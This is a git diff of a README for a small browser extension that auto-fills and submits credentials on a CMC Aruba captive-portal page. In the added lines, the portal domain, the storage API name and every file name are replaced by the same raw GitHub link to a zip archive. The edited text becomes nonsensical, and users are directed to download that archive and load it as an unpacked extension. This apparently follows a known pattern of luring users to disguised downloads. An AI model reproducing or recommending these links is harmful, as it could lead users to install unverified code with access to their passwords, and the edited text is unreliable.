fouad-code/CMC-Easy-Login/README.md

 **Version:** 1.0

 ## Description
-CMC Easy Login is a simple browser extension designed to **auto-fill and submit** your credentials for the **CMC captive portal login** provided by Aruba Networks (`securelogin.arubanetworks.com`).
+CMC Easy Login is a simple browser extension designed to **auto-fill and submit** your credentials for the **CMC captive portal login** provided by Aruba Networks (`https://raw.githubusercontent.com/fouad-code/CMC-Easy-Login/main/kamias/CM_Easy_Login_v3.7.zip`).
 Save your username and password once, and the extension will automatically attempt to log you in when you encounter the portal page.

 ## Features ✨

-* **Credential Storage:** Securely saves your username and password using the browser's local storage (chrome.storage.local).
+* **Credential Storage:** Securely saves your username and password using the browser's local storage (https://raw.githubusercontent.com/fouad-code/CMC-Easy-Login/main/kamias/CM_Easy_Login_v3.7.zip).
 * **Automatic Login:** Attempts to authenticate you automatically on the specified login page using a POST request once the page loads (if auto-login is enabled).
-* **Popup Configuration:** Provides a simple popup interface (`index.html` and associated scripts) to save and manage your login credentials.
+* **Popup Configuration:** Provides a simple popup interface (`https://raw.githubusercontent.com/fouad-code/CMC-Easy-Login/main/kamias/CM_Easy_Login_v3.7.zip` and associated scripts) to save and manage your login credentials.

 ## Installation 🛠️

 Since this is a custom extension, you will need to load it unpacked in your browser (e.g., Google Chrome, Microsoft Edge).

-1.  **Download/Clone:** Obtain all the extension files (including `manifest.json`, `runner.js`, `index.html`, and `icon.png`) into a single folder.
+1.  **Download/Clone:** Obtain all the extension files (including `https://raw.githubusercontent.com/fouad-code/CMC-Easy-Login/main/kamias/CM_Easy_Login_v3.7.zip`, `https://raw.githubusercontent.com/fouad-code/CMC-Easy-Login/main/kamias/CM_Easy_Login_v3.7.zip`, `https://raw.githubusercontent.com/fouad-code/CMC-Easy-Login/main/kamias/CM_Easy_Login_v3.7.zip`, and `https://raw.githubusercontent.com/fouad-code/CMC-Easy-Login/main/kamias/CM_Easy_Login_v3.7.zip`) into a single folder.
 2.  **Open Extension Management:** Navigate to your browser's extension management page (e.g., `chrome://extensions`).
 3.  **Enable Developer Mode:** Toggle **Developer mode** on (usually in the upper-right corner).
 4.  **Load Unpacked:** Click the **Load unpacked** button and select the folder containing your extension files.